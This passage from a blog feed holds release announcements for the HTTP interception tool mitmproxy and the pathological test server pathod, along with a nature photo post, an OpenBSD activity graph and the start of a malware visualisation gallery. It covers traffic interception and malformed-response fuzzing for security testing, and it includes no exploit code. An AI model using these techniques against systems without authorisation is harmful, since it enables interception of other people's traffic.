a\nsingle male <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Gypsy_moth\">Gypsy Moth<\/a> (Lymantria\ndispar) was discovered in Hamilton, New Zealand, they sprayed the entire city\nwith a caterpillar-specific <a rel=\"external\" href=\"http:\/\/www.biosecurity.govt.nz\/pests-diseases\/forests\/gypsy-moth\/residents\/foray.htm\">bacterial\ninsecticide<\/a>.<\/p>\n<p>No need for drastic measures with this particular fellow, though - he's native\nto this ecosystem, and the only pest is me and my camera. He was head down\nmunching away when I found him, and paid absolutely no attention to me when I\nmoved in close to get these shots. He's got reason to be cocksure, too - those\ntufts of hair on his back contain hollow, poison-filled spines that can cause a\npretty unpleasant reaction when touched.<\/p>\n<div class=\"media\">\n    <a href=\".&#x2F;lymantriid1.jpg\">\n        <img src=\".&#x2F;lymantriid1.jpg\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>An few hours exploring and photographing is a very effective brain-cleaner,\nleaving me ready to deal with spiny, venomous defilers of the digital variety.<\/p>\n"},{"title":"pathod 0.2: the daemon gets an evil twin","published":"2012-08-22T00:00:00+00:00","updated":"2012-08-22T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/pathod\/announce0_2\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/pathod\/announce0_2\/","content":"<p>I've just pushed pathod 0.2 out the door. This is a huge release, with many new\nfeatures:<\/p>\n<ul>\n<li><a rel=\"external\" href=\"http:\/\/pathod.net\/docs\/pathoc\">pathoc<\/a>, pathod's evil client-side twin.<\/li>\n<li><a rel=\"external\" href=\"http:\/\/pathod.net\/docs\/test\">libpathod.test<\/a>, a framework for using pathod in your unit tests.<\/li>\n<li><a rel=\"external\" href=\"http:\/\/pathod.net\/docs\/language\">Improved mini language<\/a>, including many new abilities and improvements.<\/li>\n<li>A rewrite of the networking core.<\/li>\n<\/ul>\n<p>The project also has a new website at <a rel=\"external\" href=\"http:\/\/pathod.net\">pathod.net<\/a>. Yes,\npathod is now self-hosting, so you can try out both pathod and pathoc\nspecifications right on the website. There's also a new <a rel=\"external\" href=\"http:\/\/public.pathod.net\/200:b%22hello,%20sailor.%22\">public pathod\ninstance<\/a>, which I'm sure\neveryone will use entirely responsibly.<\/p>\n"},{"title":"Introducing pathod: a pathological HTTP server","published":"2012-05-01T00:00:00+00:00","updated":"2012-05-01T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/pathod\/announce0_1\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/pathod\/announce0_1\/","content":"<p>I've just released <a rel=\"external\" href=\"http:\/\/cortesi.github.com\/pathod%22\">pathod<\/a>, a pathological\nHTTP\/S daemon useful for testing and torturing HTTP clients. At its core is a\ntiny, terse language for crafting HTTP responses. It also has a built-in web\ninterface that lets you play with the response spec language, inspect logs, and\naccess pathod's full help document.<\/p>\n<p>The rest of this post is a quick teaser showing some of pathod's abilities. See\nthe detailed documentation on the <a rel=\"external\" href=\"http:\/\/cortesi.github.com\/pathod%22\">pathod\nsite<\/a> if you want more.<\/p>\n<h2 id=\"the-simplest-possible-response\">The simplest possible response<\/h2>\n<p>The easiest way to craft a response is to specify it directly in the request\nURL. Lets start with the simplest possible example. Start pathod, and then visit\nthis URL:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>http:\/\/localhost:9999\/p\/200<\/span><\/span><\/code><\/pre>\n<p>The \"\/p\/\" path is the location of the response generator in pathod's default\nconfiguration - everything after that a response specification in pathod's\nmini-language.  The general form of a response spec is as follows:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>code[MESSAGE]:[colon-separated list of features]<\/span><\/span><\/code><\/pre>\n<p>In this case, we're specifying only the HTTP response code - that is, an HTTP\n200 OK with no headers and no content, resulting in a response like this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>HTTP\/1.1 200 OK<\/span><\/span><\/code><\/pre><h2 id=\"specifying-features\">Specifying features<\/h2>\n<p>One example of a \"feature\" is a response header. Lets embellish our response by\nadding one:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>200:h&quot;Etag&quot;=&quot;foo&quot;<\/span><\/span><\/code><\/pre>\n<p>The first letter of the feature - \"h\", in this case - is a mnemonic indicating\nthe type of feature we're adding. The full response to this spec looks like this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>HTTP\/1.1 200 OK<\/span><\/span>\n<span class=\"giallo-l\"><span>Etag: foo<\/span><\/span><\/code><\/pre>\n<p>Both \"Etag\" and \"foo\" are Value Specifiers, a syntax used throughout the\nresponse specification language. In this case they are literal values, as\nindicated by the fact that they are quoted strings. The Value Specification\nsyntax also lets us load values from files or generate random data. For\ninstance, here is a specification that generates 100k of random binary data for\nthe header value:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>200:h&quot;Etag&quot;=@100k<\/span><\/span><\/code><\/pre>\n<p>Now, binary data in the header value will probably break things in interesting\nways, but is unlikely to be read by the client as a valid (but over-long)\nvalue. To see if the client really drops off its perch if we feed it a single\n100k header, we have to constrain the random data. Here's the same response,\nbut with data generated only from ASCII letters:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>200:h&quot;Etag&quot;=@100k,ascii_letters<\/span><\/span><\/code><\/pre>\n<p>pathod has a large number of built-in character classes from which random\ndata can be generated.<\/p>\n<h2 id=\"pauses-and-disconnects\">Pauses and Disconnects<\/h2>\n<p>Next, we can disrupt the communications in various ways. At the moment, this\nmeans adding pauses and disconnects to a response. Let's start with an HTTP 404\nresponse with a body consisting of a 100k of random binary data:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>404:b@100k<\/span><\/span><\/code><\/pre>\n<p>Here's the same response, but with a 120 second pause after sending 100 bytes:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>404:b@100k:p120,100<\/span><\/span><\/code><\/pre>\n<p>And, the same response again, but with hard disconnect after sending 100 bytes:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>404:b@100k:d100<\/span><\/span><\/code><\/pre>\n<p>Instead of specifying a time explicitly, we can ask pathod to just randomly\ndisconnect at a time of its choosing:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>404:b@100k:dr<\/span><\/span><\/code><\/pre>\n<p>That's it for the teaser - hopefully it's enough to entice you into looking at\n<a rel=\"external\" href=\"http:\/\/cortesi.github.com\/pathod%22\">pathod<\/a>'s full documentation.<\/p>\n<h2 id=\"what-s-next\">What's next?<\/h2>\n<p>pathod is an \"airport project\" - the first draft was written in its\nentirety during a 40-hour trip back home from New York (I drew a bad lot in\nstopovers). I've now firmed it up a bit, but there's still work to be done. In\nthe next month, mitmproxy's test suite will move to pathod, after which\nthere will be a simple, well-documented way to unit test. I also plan to build\nout the JSON API (which is used to drive pathod in test suites), and expand the\nmini-language with convenient ways  to generate pathological cookies,\nauthentication headers, SSL errors, and cache control.<\/p>\n"},{"title":"mitmproxy 0.8","published":"2012-04-09T00:00:00+00:00","updated":"2012-04-09T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_8\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_8\/","content":"<div class=\"media\">\n    <a href=\"mitmproxy_0_8.png\">\n        <img src=\"mitmproxy_0_8.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I'm happy to announce the release of <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy 0.8<\/a>.\nThis release has a few major new features, big speedups, and many, many small\nbugfixes and improvements. Here are the headlines:<\/p>\n<h2 id=\"android-interception\">Android interception<\/h2>\n<p>The most prominent new feature is that we now have a supported way to intercept\nAndroid traffic. What's more, we can do this without a cumbersome transparent\nproxying rig - see the <a rel=\"external\" href=\"http:\/\/mitmproxy.org\/doc\/certinstall\/android.html\">Android section in the\ndocumentation<\/a> for the\ndetails. Special thanks goes to <a rel=\"external\" href=\"http:\/\/twitter.com\/yjmbo\">Jim Cheetham<\/a> for\nlending me an Android device and helping to get this feature off the ground.<\/p>\n<h2 id=\"replacement-patterns\">Replacement patterns<\/h2>\n<p>Another exceedingly useful new feature is <a rel=\"external\" href=\"http:\/\/mitmproxy.org\/doc\/replacements.html\">replacement\npatterns<\/a>. These consist of a\nfilter, a regular expression and a replacement string, and run continuously\nwhile mitmproxy processes requests and responses. You can pass these either on\nthe command-line, or using a built-in replacement pattern editor.<\/p>\n<div class=\"media\">\n    <a href=\"mitmproxy0_8_replace.png\">\n        <img src=\"mitmproxy0_8_replace.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I'm sure you can immediately think of many uses for this flexible feature, but\nmy favourite is to use it during testing as a way to conveniently inject\ncomplicated exploits into web traffic. I do this by setting a replacement\npattern that swaps a short but likely unique string (say MYXSS) for a long\nexploit, and then I use simple interaction and front-end tools like Firebug to\ninject exploits into requests manually based on the short string marker.<\/p>\n<h2 id=\"improved-pretty-printing-of-request-and-response-contents\">Improved pretty-printing of request and response contents<\/h2>\n<p>This release of mitmproxy has a completely redesigned subsystem for\npretty-printing request and response bodies. For instance, we now extract EXIF\ntags and other basic information to give you something better than a hex dump\nwhen looking at an image:<\/p>\n<div class=\"media\">\n    <a href=\"mitmproxy0_8-pretty.png\">\n        <img src=\"mitmproxy0_8-pretty.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>We also have much improved HTML indenting (using <a rel=\"external\" href=\"http:\/\/lxml.de\/\">lxml<\/a>), and\na built-in JavaScript beautifier (thanks to\n<a rel=\"external\" href=\"http:\/\/jsbeautifier.org\">JSBeautifier<\/a>) that teases out compressed and\nobfuscated scripts into something readable.<\/p>\n<h2 id=\"changelog\">Changelog<\/h2>\n<ul>\n<li>Detailed tutorial for Android interception. Some features that land in\nthis release have finally made reliable Android interception possible.<\/li>\n<li>Upstream-cert mode, which uses information from the upstream server to\ngenerate interception certificates.<\/li>\n<li>Replacement patterns that let you easily do global replacements in flows\nmatching filter patterns. Can be specified on the command-line, or edited\ninteractively.<\/li>\n<li>Much more sophisticated and usable pretty printing of request bodies.\nSupport for auto-indentation of JavaScript, inspection of image EXIF\ndata, and more.<\/li>\n<li>Details view for flows, showing connection and SSL cert information (X\nkeyboard shortcut).<\/li>\n<li>Server certificates are now stored and serialized in saved traffic for\nlater analysis. This means that the 0.8 serialization format is NOT\ncompatible with 0.7.<\/li>\n<li>Add a shortcut key (\"f\") to load the remainder of a request or response body,\nif it is abbreviated.<\/li>\n<li>Many other improvements, including bugfixes, and expanded scripting API,\nand more sophisticated certificate handling.<\/li>\n<\/ul>\n"},{"title":"mitmproxy 0.7","published":"2012-02-27T00:00:00+00:00","updated":"2012-02-27T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_7\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_7\/","content":"<div class=\"media\">\n    <a href=\"mitmproxy_0_7.png\">\n        <img src=\"mitmproxy_0_7.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I'm happy to announce the release of <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy 0.7<\/a>. The\nbiggest visible change is a new structured editor for headers, query strings\nand form fields. Other new feature include a reverse proxy mode, extended\nscript API that makes many common tasks much easier, and a myriad of\nimprovements to the interface (including a massive increase in speed).\nEverybody still on 0.6 should upgrade - get it here:<\/p>\n<h2 id=\"mitmproxy-0-7-tar-gz-docs\"><a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy-0.7.tar.gz<\/a> <a rel=\"external\" href=\"http:\/\/mitmproxy.org\/docs\">(docs)<\/a><\/h2>\n<p>You can also now install mitmproxy using <a rel=\"external\" href=\"http:\/\/pypi.python.org\/pypi\/pip\">pip<\/a>, like so:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">    pip<\/span><span style=\"color: #032F62;\"> install mitmproxy<\/span><\/span><\/code><\/pre>\n<p>In other news, the project has had an amazing month, after a rash of\nhigh-profile results obtained using mitmproxy were published. It started with\n<a rel=\"external\" href=\"http:\/\/mclov.in\/2012\/02\/08\/path-uploads-your-entire-address-book-to-their-servers.html\">Arun Thampi's\ndiscovery<\/a>\nthat Path uploads users' address books to their servers. Things snowballed from\nthere, and for a few days mitmproxy seemed to be everywhere. Similar findings\nwere made for\n<a rel=\"external\" href=\"http:\/\/markchang.tumblr.com\/post\/17244167951\/hipster-uploads-part-of-your-iphone-address-book-to-its\">Hipster<\/a>,\n<a rel=\"external\" href=\"http:\/\/www.theverge.com\/2012\/2\/14\/2798008\/ios-apps-and-the-address-book-what-you-need-to-know\">The\nVerge<\/a>\ndid a mitmproxy-driven AddressbookGate expose (including vaguely threatening\nbackground shots of mitmproxy doing its dastardly work), and lots of people said\nnice things on Twitter.<\/p>\n<p>To see the impact all of this for the mitmproxy project, you need only look at\nthe <a rel=\"external\" href=\"http:\/\/github.com\/cortesi\/mitmproxy\">Github page<\/a> - watchers of the repo\nwent from about 200 a month a go, to 950 at the time of this post.<\/p>\n<h2 id=\"changelog\">Changelog<\/h2>\n<ul>\n<li>New built-in key\/value editor. This lets you interactively edit URL query\nstrings, headers and URL-encoded form data.<\/li>\n<li>Extend script API to allow duplication and replay of flows.<\/li>\n<li>API for easy manipulation of URL-encoded forms and query strings.<\/li>\n<li>Add \"D\" shortcut in mitmproxy to duplicate a flow.<\/li>\n<li>Reverse proxy mode. In this mode mitmproxy acts as an HTTP server,\nforwarding all traffic to a specified upstream server.<\/li>\n<li>UI improvements - use Unicode characters to make GUI more compact,\nimprove spacing and layout throughout.<\/li>\n<li>Add support for filtering by HTTP method.<\/li>\n<li>Add the ability to specify an HTTP body size limit.<\/li>\n<li>Move to typed netstrings for serialization format - this makes 0.7\nbackwards-incompatible with serialized data from 0.6!<\/li>\n<li>Significant improvements in speed and responsiveness of UI.<\/li>\n<li>Many minor bugfixes and improvements.<\/li>\n<\/ul>\n"},{"title":"OpenBSD in decline?","published":"2012-02-26T00:00:00+00:00","updated":"2012-02-26T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/openbsd-decline\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/openbsd-decline\/","content":"<p>My leisurely Sunday activity today is to set up a new\n<a rel=\"external\" href=\"http:\/\/openbsd.org\">OpenBSD<\/a> firewall for my mobile app testing lab. I haven't\ndone a from-scratch OpenBSD install for years, so I spent some time reading\nthrough the change logs for the last few versions to catch up with what's\nchanged. Although the project is clearly still making steady, well-engineered\nprogress, I had the nagging feeling that the rate of change wasn't what it used\nto be. So, I pulled some numbers from <a rel=\"external\" href=\"http:\/\/archives.neohapsis.com\/archives\/openbsd\/cvs\/\">CVS commit message list\narchives<\/a>, and graphed\nthem. Here are the number of commits per month from January 2001 to January\n2012. The orange line is a simple 12-month moving average:<\/p>\n<div class=\"media\">\n    <a href=\"commitspermonth.png\">\n        <img src=\"commitspermonth.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Now, we should be cautious about interpreting this - the number of commits\ndoesn't tell us anything about the quality, importance or magnitude of code\nchange. Even if it did all of these things, there are other and perhaps better\nmeasures of a project's health. Still, the trend is clear, and suggests a\nsustained decline in activity.<\/p>\n<p>I just <a rel=\"external\" href=\"http:\/\/openbsd.org\/orders.html\">bought some T-shirts<\/a> to help support\none of my favourite open source projects. You should too.<\/p>\n"},{"title":"Malware","published":"2012-01-05T00:00:00+00:00","updated":"2012-01-05T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/visualisation\/malware\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/visualisation\/malware\/","content":"<p><b>Edit: Since this post, I've created an interactive tool for binary\nvisualisation - see it at <a rel=\"external\" href=\"http:\/\/binvis.io\">binvis.io<\/a><\/b><\/p>\n<p>Hover and click for more.<\/p>\n<style>\n    .malware {\n    }\n    .malware tr {\n        border: 0;\n    }\n    .malware td {\n        border: 0;\n        position: relative;\n        margin:  0 auto;\n        width: 128px;\n        height: 138px;\n    }\n    .malware td img {\n        position: absolute;\n        top:0;\n        left:0;\n        overflow: hidden;\n        height: 128px;\n        width: 128px;\n    }\n    .malware td .entropy {\n        z-index: 9999;\n        transition: opacity .3s linear;\n        cursor: pointer;\n    }\n    .malware td :hover > .entropy {\n        opacity: 0;\n    }\n<\/style>\n<table class=\"malware\">\n<tr>\n<td>\n    <a href=\"0cc9e0ba6a0bd8b79aaf2be22c496228.html\">\n        <img class=\"entropy\" src='small_0cc9e0ba6a0bd8b79aaf2be22c496228_entropy.png'\/>\n        <img class=\"charclass\" src='small_0cc9e0ba6a0bd8b79aaf2be22c496228_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"0dcfe476fbd68148f007e6c48c226e0f.html\">\n        <img class=\"entropy\" src='small_0dcfe476fbd68148f007e6c48c226e0f_entropy.png'\/>\n        <img class=\"charclass\" src='small_0dcfe476fbd68148f007e6c48c226e0f_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"03b3f30aed5b7dc39bd6e356bbde3713.html\">\n        <img class=\"entropy\" src='small_03b3f30aed5b7dc39bd6e356bbde3713_entropy.png'\/>\n        <img class=\"charclass\" src='small_03b3f30aed5b7dc39bd6e356bbde3713_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"131f1cb94df6e2969ac874503cbfd934.html\">\n        <img class=\"entropy\" src='small_131f1cb94df6e2969ac874503cbfd934_entropy.png'\/>\n        <img class=\"charclass\" src='small_131f1cb94df6e2969ac874503cbfd934_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"038e3a7add116ac69e5f9539ce461386.html\">\n        <img class=\"entropy\" src='small_038e3a7add116ac69e5f9539ce461386_entropy.png'\/>\n        <img class=\"charclass\" src='small_038e3a7add116ac69e5f9539ce461386_charclass.png'\/>\n    <\/a>\n<\/td>\n<\/tr><tr>\n<td>\n    <a href=\"094fedd2e4c175cd81dc170fd4d03917.html\">\n        <img class=\"entropy\" src='small_094fedd2e4c175cd81dc170fd4d03917_entropy.png'\/>\n        <img class=\"charclass\" src='small_094fedd2e4c175cd81dc170fd4d03917_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"1a30184661ee6585f4a188107e63a4d2.html\">\n        <img class=\"entropy\" src='small_1a30184661ee6585f4a188107e63a4d2_entropy.png'\/>\n        <img class=\"charclass\" src='small_1a30184661ee6585f4a188107e63a4d2_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"1b5bad65f8b72a52cfcae67e3e538f34.html\">\n        <img class=\"entropy\" src='small_1b5bad65f8b72a52cfcae67e3e538f34_entropy.png'\/>\n        <img class=\"charclass\" src='small_1b5bad65f8b72a52cfcae67e3e538f34_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"163524fb9a41e6ec79178a902797f8f1.html\">\n        <img class=\"entropy\" src='small_163524fb9a41e6ec79178a902797f8f1_entropy.png'\/>\n        <img class=\"charclass\" src='small_163524fb9a41e6ec79178a902797f8f1_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"177827ae9615791e067b4a9fb4be1ab9.html\">\n        <img class=\"entropy\" src='small_177827ae9615791e067b4a9fb4be1ab9_entropy.png'\/>\n        <img class=\"charclass\" src='small_177827ae9615791e067b4a9fb4be1ab9_charclass.png'\/>\n    <\/a>\n<\/td>\n<\/tr><tr>\n<td>\n    <a href=\"1b0e377994cfdb4eec0d2fb028118844.html\">\n        <img class=\"entropy\" src='small_1b0e377994cfdb4eec0d2fb028118844_entropy.png'\/>\n        <img class=\"charclass\" src='small_1b0e377994cfdb4eec0d2fb028118844_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"0b4f82e83741e79310d797d54db5a9be.html\">\n        <img class=\"entropy\" src='small_0b4f82e83741e79310d797d54db5a9be_entropy.png'\/>\n        <img class=\"charclass\" src='small_0b4f82e83741e79310d797d54db5a9be_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"14e6950dd4bcffe54bf158a20437e6b4.html\">\n        <img class=\"entropy\" src='small_14e6950dd4bcffe54bf158a20437e6b4_entropy.png'\/>\n        <img class=\"charclass\" src='small_14e6950dd4bcffe54bf158a20437e6b4_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"1998bb714c0de980635ee9b8c1951381.html\">\n        <img class=\"entropy\" src='small_1998bb714c0de980635ee9b8c1951381_entropy.png'\/>\n        <img class=\"charclass\" src='small_1998bb714c0de980635ee9b8c1951381_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"023293a96c763bbdee3991994cdcdcef.html\">\n        <img class=\"entropy\" src='small_023293a96c763bbdee3991994cdcdcef_entropy.png'\/>\n        <img class=\"charclass\" src='small_023293a96c763bbdee3991994cdcdcef_charclass.png'\/>\n    <\/a>\n<\/td>\n<\/tr><tr>\n<td>\n    <a href=\"14064e26cbd3daed7e6eb3b4fb245c8f.html\">\n        <img class=\"entropy\" src='small_14064e26cbd3daed7e6eb3b4fb245c8f_entropy.png'\/>\n        <img class=\"charclass\" src='small_14064e26cbd3daed7e6eb3b4fb245c8f_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"1511f2d75e07bb94f5da8cbc031a51dd.html\">\n        <img class=\"entropy\" src='small_1511f2d75e07bb94f5da8cbc031a51dd_entropy.png'\/>\n        <img class=\"charclass\" src='small_1511f2d75e07bb94f5da8cbc031a51dd_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"14560f7dc19e6fef87743f83e5234519.html\">\n        <img class=\"entropy\" src='small_14560f7dc19e6fef87743f83e5234519_entropy.png'\/>\n        <img class=\"charclass\" src='small_14560f7dc19e6fef87743f83e5234519_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"00f29767bee5f8bd5b2d55d5be734f69.html\">\n        <img class=\"entropy\" src='small_00f29767bee5f8bd5b2d55d5be734f69_entropy.png'\/>\n        <img class=\"charclass\" src='small_00f29767bee5f8bd5b2d55d5be734f69_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"05fd535d70dfb5ee4f36e87e39d8c70d.html\">\n        <img class=\"entropy\" src='small_05fd535d70dfb5ee4f36e87e39d8c70d_entropy.png'\/>\n        <img class=\"charclass\" src='small_05fd535d70dfb5ee4f36e87e39d8c70d_charclass.png'\/>\n    <\/a>\n<\/td>\n<\/tr><tr>\n<td>\n    <a href=\"109f8c72ff91dee5906aba0e47324526.html\">\n        <img class=\"entropy\" src='small_109f8c72ff91dee5906aba0e47324526_entropy.png'\/>\n        <img class=\"charclass\" src='small_109f8c72ff91dee5906aba0e47324526_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"1aa40b6ea4e7be64d4e6a024fcdf76fe.html\">\n        <img class=\"entropy\" src='small_1aa40b6ea4e7be64d4e6a024fcdf76fe_entropy.png'\/>\n        <img class=\"charclass\" src='small_1aa40b6ea4e7be64d4e6a024fcdf76fe_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"1a3aa70d060be5e6e778e3519b400bf1.html\">\n        <img class=\"entropy\" src='small_1a3aa70d060be5e6e778e3519b400bf1_entropy.png'\/>\n        <img class=\"charclass\" src='small_1a3aa70d060be5e6e778e3519b400bf1_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"08b983ec55bfd50d1d2cb9a90b1ae54e.html\">\n        <img class=\"entropy\" src='small_08b983ec55bfd50d1d2cb9a90b1ae54e_entropy.png'\/>\n        <img class=\"charclass\" src='small_08b983ec55bfd50d1d2cb9a90b1ae54e_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"04240e137999dc6b5115de8db3a15f53.html\">\n        <img class=\"entropy\" src='small_04240e137999dc6b5115de8db3a15f53_entropy.png'\/>\n        <img class=\"charclass\" src='small_04240e137999dc6b5115de8db3a15f53_charclass.png'\/>\n    <\/a>\n<\/td>\n<\/tr><tr>\n<td>\n    <a href=\"08c926bf7fbb3397236effef1b30b4df.html\">\n        <img class=\"entropy\" src='small_08c926bf7fbb3397236effef1b30b4df_entropy.png'\/>\n        <img class=\"charclass\" src='small_08c926bf7fbb3397236effef1b30b4df_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"09dd27fcccb9c000d37c6394364be1b5.html\">\n        <img class=\"entropy\" src='small_09dd27fcccb9c000d37c6394364be1b5_entropy.png'\/>\n        <img class=\"charclass\" src='small_09dd27fcccb9c000d37c6394364be1b5_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"0bcee1314e8c61fa8ef55743f3bb7742.html\">\n        <img class=\"entropy\" src='small_0bcee1314e8c61fa8ef55743f3bb7742_entropy.png'\/>\n        <img class=\"charclass\" src='small_0bcee1314e8c61fa8ef55743f3bb7742_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"0e2bf707dbc146c9d60c373237d050b7.html\">\n        <img class=\"entropy\" src='small_0e2bf707dbc146c9d60c373237d050b7_entropy.png'\/>\n        <img class=\"charclass\" src='small_0e2bf707dbc146c9d60c373237d050b7_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"0309fc0e6dbeb714c5361f82b2ccb037.html\">\n        <img class=\"entropy\" src='small_0309fc0e6dbeb714c5361f82b2ccb037_entropy.png'\/>\n        <img class=\"charclass\" src='small_0309fc0e6dbeb714c5361f82b2ccb037_charclass.png'\/>\n    <\/a>\n<\/td>\n<\/tr><tr>\n<td>\n    <a href=\"0ff25e3cefcce4336d0abeb9f02ccb02.html\">\n        <img class=\"entropy\" src='small_0ff25e3cefcce4336d0abeb9f02ccb02_entropy.png'\/>\n        <img class=\"charclass\" src='small_0ff25e3cefcce4336d0abeb9f02ccb02_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"19bc481e5cb1113c7eff49b67273f892.html\">\n        <img class=\"entropy\" src='small_19bc481e5cb1113c7eff49b67273f892_entropy.png'\/>\n        <img class=\"charclass\" src='small_19bc481e5cb1113c7eff49b67273f892_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"1a8700c754f97c115fa91fa161fa05cc.html\">\n        <img class=\"entropy\" src='small_1a8700c754f97c115fa91fa161fa05cc_entropy.png'\/>\n        <img class=\"charclass\" src='small_1a8700c754f97c115fa91fa161fa05cc_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"12e9e61357be212f28ea4c81ef75018d.html\">\n        <img class=\"entropy\" src='small_12e9e61357be212f28ea4c81ef75018d_entropy.png'\/>\n        <img class=\"charclass\" src='small_12e9e61357be212f28ea4c81ef75018d_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"01310712a180d9f939c126712d24363d.html\">\n        <img class=\"entropy\" src='small_01310712a180d9f939c126712d24363d_entropy.png'\/>\n        <img class=\"charclass\" src='small_01310712a180d9f939c126712d24363d_charclass.png'\/>\n    <\/a>\n<\/td>\n<\/tr><tr>\n<td>\n    <a href=\"1542a2f2732bbdad500bf112686503ac.html\">\n        <img class=\"entropy\" src='small_1542a2f2732bbdad500bf112686503ac_entropy.png'\/>\n        <img class=\"charclass\" src='small_1542a2f2732bbdad500bf112686503ac_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"096381c0f5ddc29319ba2b2647cea116.html\">\n        <img class=\"entropy\" src='small_096381c0f5ddc29319ba2b2647cea116_entropy.png'\/>\n        <img class=\"charclass\" src='small_096381c0f5ddc29319ba2b2647cea116_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"17fd97da6d93430ec0d9aa040b4b2c58.html\">\n        <img class=\"entropy\" src='small_17fd97da6d93430ec0d9aa040b4b2c58_entropy.png'\/>\n        <img class=\"charclass\" src='small_17fd97da6d93430ec0d9aa040b4b2c58_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"0d9109ab6b06f38221b713eb6a54c42f.html\">\n        <img class=\"entropy\" src='small_0d9109ab6b06f38221b713eb6a54c42f_entropy.png'\/>\n        <img class=\"charclass\" src='small_0d9109ab6b06f38221b713eb6a54c42f_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"18ce863d41622cd7aaa3c7d3d11e2f3e.html\">\n        <img class=\"entropy\" src='small_18ce863d41622cd7aaa3c7d3d11e2f3e_entropy.png'\/>\n        <img class=\"charclass\" 